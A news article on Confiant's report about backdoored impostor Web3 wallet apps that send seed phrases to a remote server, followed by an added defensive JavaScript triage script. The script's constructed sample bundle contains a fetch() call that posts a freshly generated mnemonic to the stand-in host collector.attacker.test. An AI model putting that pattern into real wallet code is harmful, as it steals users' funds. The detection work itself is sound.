Confiant, an advertising-security firm, has uncovered a cluster of malicious activity around Web3 wallet applications: backdoored impostor wallets that let attackers steal users' seed phrases and drain their funds. The apps are distributed through clones of the legitimate wallets' websites, so a user believes they are downloading the genuine application.
Malicious cluster targets Web3-enabled wallets such as Metamask
Attackers keep devising new ways to take advantage of cryptocurrency users. Confiant, a company that studies the quality of online advertising and the security risks it can pose to Internet users, has warned about a new type of attack affecting users of popular Web3 wallets such as Metamask and Coinbase Wallet.
The cluster, which Confiant tracks as “Seaflower”, is described in the report as one of the most sophisticated attacks of its kind. Ordinary users are unlikely to notice anything wrong, because the impostor apps look and behave almost exactly like the originals; the difference is in the code, which has been modified to steal the wallet's seed phrase and thereby give the attackers access to the funds.
Distribution and recommendations
The report found that these apps are distributed mostly outside the regular app stores, through links that users find on search engines such as Baidu. The researchers assess that the cluster is likely of Chinese origin, based on the language of the comments in its code, the location of its infrastructure and the services it uses.
The download links reach high positions in search results through deliberate SEO manipulation, which lets them rank well and trick users into believing they are visiting the real site. Much of the sophistication lies in how the malicious code is concealed: it is obfuscated, which hides much of how the backdoor works.
The backdoored Metamask impostor sends the seed phrase to a remote server at the moment the wallet is created; this is its main exfiltration path. The impostors of the other wallets use a very similar mechanism.
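As an added illustration of how an analyst can triage a suspected impostor for this behaviour, the script below is not code from the Confiant report or from any wallet project. It runs a static check over the JavaScript bundle that wallet apps commonly ship (React Native or browser-extension builds): it finds seed-phrase generation call sites and reports any network sink that follows within a short window, together with every URL literal in that window whose host is not on the analyst's allowlist. The function names it looks for, the allowlisted host, the window size and the two sample bundles are constructed assumptions, not material from the report.

```javascript
// Added example, not code from the Confiant report or from any wallet project.
// Static triage of a wallet app's JavaScript bundle: locate seed-phrase
// generation call sites and report any network sink that follows within a
// short window, plus every URL literal in that window whose host is not on
// the analyst's allowlist. Function names, hosts, window size and the two
// sample bundles below are constructed assumptions for illustration.

// Call sites that produce or consume a fresh seed phrase (assumed names from
// common wallet/bip39 libraries).
const SEED_PATTERNS = [
  /generateMnemonic\s*\(/,
  /mnemonicToSeed(?:Sync)?\s*\(/,
  /createWallet\s*\(/,
];

// Network sinks a backdoor could use to ship the phrase out.
const SINK_PATTERNS = [
  /\bfetch\s*\(/,
  /\bXMLHttpRequest\b/,
  /\baxios\.(?:post|get|request)\s*\(/,
  /navigator\.sendBeacon\s*\(/,
];

// String literals that look like absolute http(s) URLs.
const URL_LITERAL = /["'`](https?:\/\/[^"'`\s]+)["'`]/g;

function hostOf(url) {
  try {
    return new URL(url).hostname.toLowerCase();
  } catch {
    return null;
  }
}

// For each seed-generation call site, collect the sinks and non-allowlisted
// hosts that appear within `windowChars` characters after it. A finding with
// sinks but no hosts still matters: the URL may be assembled at runtime.
function findExfilCandidates(source, allowedHosts, windowChars = 600) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const findings = [];
  for (const seedRe of SEED_PATTERNS) {
    const re = new RegExp(seedRe.source, 'g');
    let m;
    while ((m = re.exec(source)) !== null) {
      const region = source.slice(m.index, m.index + windowChars);
      const sinks = SINK_PATTERNS.filter((s) => s.test(region)).map((s) => s.source);
      if (sinks.length === 0) continue;
      const hosts = new Set();
      for (const u of region.matchAll(URL_LITERAL)) {
        const h = hostOf(u[1]);
        if (h && !allowed.has(h)) hosts.add(h);
      }
      findings.push({ offset: m.index, call: m[0], sinks, hosts: [...hosts].sort() });
    }
  }
  return findings;
}

// Flattened view: distinct non-allowlisted hosts reachable from any finding.
function suspiciousHosts(source, allowedHosts, windowChars = 600) {
  const all = new Set();
  for (const f of findExfilCandidates(source, allowedHosts, windowChars)) {
    for (const h of f.hosts) all.add(h);
  }
  return [...all].sort();
}

// Constructed allowlist: the only host the genuine wallet is expected to call.
const ALLOWED_HOSTS = ['rpc.example-wallet.test'];

// Constructed sample: a clean bundle encrypts the phrase locally; its only
// network call goes to the allowlisted RPC host.
const CLEAN_BUNDLE = `
function onboard(password) {
  const mnemonic = bip39.generateMnemonic(128);
  store.set('vault', encrypt(mnemonic, password));
}
function getBalance(addr) {
  return fetch("https://rpc.example-wallet.test/balance?a=" + addr);
}
`;

// Constructed sample: a backdoored bundle that posts the phrase to a
// third-party host at the moment it is created, the behaviour the report
// attributes to the Metamask impostor.
const BACKDOORED_BUNDLE = `
function onboard(password) {
  const mnemonic = bip39.generateMnemonic(128);
  fetch("https://collector.attacker.test/api/seed", {
    method: "POST",
    body: JSON.stringify({ m: mnemonic, t: Date.now() }),
  });
  store.set('vault', encrypt(mnemonic, password));
}
`;

console.log('clean:', JSON.stringify(findExfilCandidates(CLEAN_BUNDLE, ALLOWED_HOSTS)));
console.log('backdoored:', JSON.stringify(findExfilCandidates(BACKDOORED_BUNDLE, ALLOWED_HOSTS)));
```

Run with `node` against an unpacked bundle read from disk in place of the sample strings. The clean sample still yields one finding (a `fetch` within the window of `generateMnemonic`), but with no non-allowlisted host, which is the signal to inspect it by hand rather than a verdict; the backdoored sample surfaces `collector.attacker.test`. Because the page says the real backdoor is obfuscated, a check like this is a first pass only: string literals may be encoded and sinks wrapped, so a dynamic run with network capture is the next step.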
The researchers also made a number of recommendations for keeping wallets on devices secure. Since the backdoored apps were observed only outside the official app stores, Confiant advises users to install wallet apps from the official Android and iOS stores, and, given the manipulated search results described above, to reach those store listings from the wallet's official website rather than from a search-engine link.
Credit: news.bitcoin.com